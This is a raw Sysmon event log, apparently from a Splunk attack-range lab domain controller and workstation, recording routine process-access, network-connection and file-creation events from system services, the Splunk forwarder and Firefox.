10:33:42.580{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.580{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.033{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD25C2111562C2DE30A1F4FCAC84D13C,SHA256=18289F9F667DE3198FBC1E82B9780E1ECAB784267ABC273E9C9AEE8ADEA10D04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:43.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35CD6F5097DE2098CB2A3A766A228916,SHA256=41654F71F48954D197EC797B066B0467FA442A8E2B2934CEDA1235D0AC817ACD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.058{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53186-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.058{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53186-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000284538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.582{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91605D5EF26484A5CC8BDE07810C9FA8,SHA256=3FAE13C927B0E96BFA2766D8090A0EEA2B42111ABE3BDCC007D0FA4757854F18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.582{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.582{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000284535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53185-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000284534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.233{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:c830:d833:fbf:ffff-54276-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000284533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.233{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local54276-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000284532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.214{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53184-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000284531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:41.214{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53184-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 10341000x8000000000000000284530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.419{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.419{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.419{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:43.102{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A8441ABF46E399CA0C24A6CEBB5DE51,SHA256=9FB5373D8D199E9763F815B4A3C42D55030562147C45E90C061816F64B3E64A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:44.993{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C15BC32284660ED576C70995842C4D0B,SHA256=0CEEF357F21ADF181CD93F758CE1363BA6165945CE7D4B1070A6D2F511A12E31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:44.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC3E6E1BA69CDB047A1B08C4BFF1CC69,SHA256=B01CD5892DA465BCD4D61FC9789D8D31B9A77A87B5319319FEB2632BA292A467,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.897{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53187-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:42.897{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53187-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000284549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.581{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\pending_pings\bcbbb622-4c3f-4d7b-b8d4-2b13bfb7f68bMD5=02213EC848451B3F02BB7EAF35036FF6,SHA256=DC737F89822027D7EF4E30066E24262565AFD0CF7C2D6AA0992A65A1247D8299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.319{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=4C73FEDBE8618C3D97840B0AD31FBF69,SHA256=0AF8B2A1553B24EC2A7628C57EADDA7E9AEA64E0FAD96CC48957356550F0B542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.281{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=EF09B4E57671E707683DE7EF899B69A6,SHA256=1499ABA0A57C7745C0E574A6E415C5CEF9636504DC6E4F1696DF4F787D8C0479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.281{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=F20DE062BBE0C7A8438F39D9B3692106,SHA256=411E9F29A380886B6C2C2EE95C72CCC3E927F996490D65D4E27A1F6D0306CF5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.265{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=76B26BBAB7D5A517D3EB8BF01D64988F,SHA256=A30F00BDCE2E73EC9384B8351C30346379D9885C10BAD68945348D0F610A9301,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.265{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=5C527EEC583A71E14591C5DA7405CDA0,SHA256=A347A44AA4EC8BEF48EB471E573942DB39AFB240DFCDD19393F475504CD41BE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.265{C8EA50B7-0169-6216-B402-000000003802}4248ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=B4AD484BBB16EDEB346E10DAABA3FCFD,SHA256=5000C87ACED6E56197FD286C43F2986B9BA756CA42E42D8BE45C6B41C8D9E388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:45.134{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=558564D174C400FF68B53FACFBAE128A,SHA256=83BC5358AE847BD647BEEEFC0291FFA7346787031D676F1F321274A6161D8FA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D89-6216-E103-000000003902}1936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:45.633{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 